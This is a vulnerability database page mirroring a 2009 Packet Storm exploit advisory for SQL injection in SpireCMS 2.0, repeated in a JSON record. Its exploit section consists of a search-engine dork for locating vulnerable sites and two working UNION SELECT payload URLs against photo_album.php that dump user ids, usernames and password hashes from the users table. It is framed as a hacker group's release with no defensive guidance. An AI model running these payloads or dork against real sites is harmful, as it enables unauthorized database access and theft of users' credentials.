Search...

SpireCMS 2.0 SQL Injection

2009-12-14T00:00:00

ID PACKETSTORM:83780
Type packetstorm
Reporter Cr3w-D
Modified 2009-12-14T00:00:00

Description

                                        
                                            `  
view source  
print?  
ALGERIAN HACKER  
**********************- NORTH-AFRICA SECURITY TEAM -***********************  
  
[!] SpireCMS v2.0 SQL Injection Vulnerability  
[!] Author : Dr.0rYX and Cr3w-DZ  
[!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de  
  
***************************************************************************/  
  
[ Software Information ]  
  
[+] Vendor : http://www.spiread.com/  
[+] script : SpireCMS v2.0  
[+] Download : http://www.spiread.com/demo/ (sell script)  
[+] Vulnerability : php SQL injection  
[+] Dork :inurl:"photo_album.php?alb_id="  
  
**************************************************************************/  
[ Vulnerable File ]  
  
http://server/photo_album.php?alb_id=[N.A.S.T ]  
  
[ Exploit ]  
  
http://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password)+from+users  
  
http://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password),null+from+users  
  
[ GReets ]  
  
[+] :claw , le0n , exploit-db.com , ALL HACKERS MUSLIMS  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:83780", "type": "packetstorm", "bulletinFamily": "exploit", "title": "SpireCMS 2.0 SQL Injection", "description": "", "published": "2009-12-14T00:00:00", "modified": "2009-12-14T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/83780/SpireCMS-2.0-SQL-Injection.html", "reporter": "Cr3w-D", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:29", "viewCount": 1, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2016-11-03T10:22:29", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:29", "rev": 2}, "vulnersScore": -0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/83780/spirecms-sql.txt", "sourceData": "` \nview source \nprint? \nALGERIAN HACKER \n**********************- NORTH-AFRICA SECURITY TEAM -*********************** \n \n[!] SpireCMS v2.0 SQL Injection Vulnerability \n[!] Author : Dr.0rYX and Cr3w-DZ \n[!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de \n \n***************************************************************************/ \n \n[ Software Information ] \n \n[+] Vendor : http://www.spiread.com/ \n[+] script : SpireCMS v2.0 \n[+] Download : http://www.spiread.com/demo/ (sell script) \n[+] Vulnerability : php SQL injection \n[+] Dork :inurl:\"photo_album.php?alb_id=\" \n \n**************************************************************************/ \n[ Vulnerable File ] \n \nhttp://server/photo_album.php?alb_id=[N.A.S.T ] \n \n[ Exploit ] \n \nhttp://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password)+from+users \n \nhttp://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password),null+from+users \n \n[ GReets ] \n \n[+] :claw , le0n , exploit-db.com , ALL HACKERS MUSLIMS \n \n`\n", "immutableFields": []}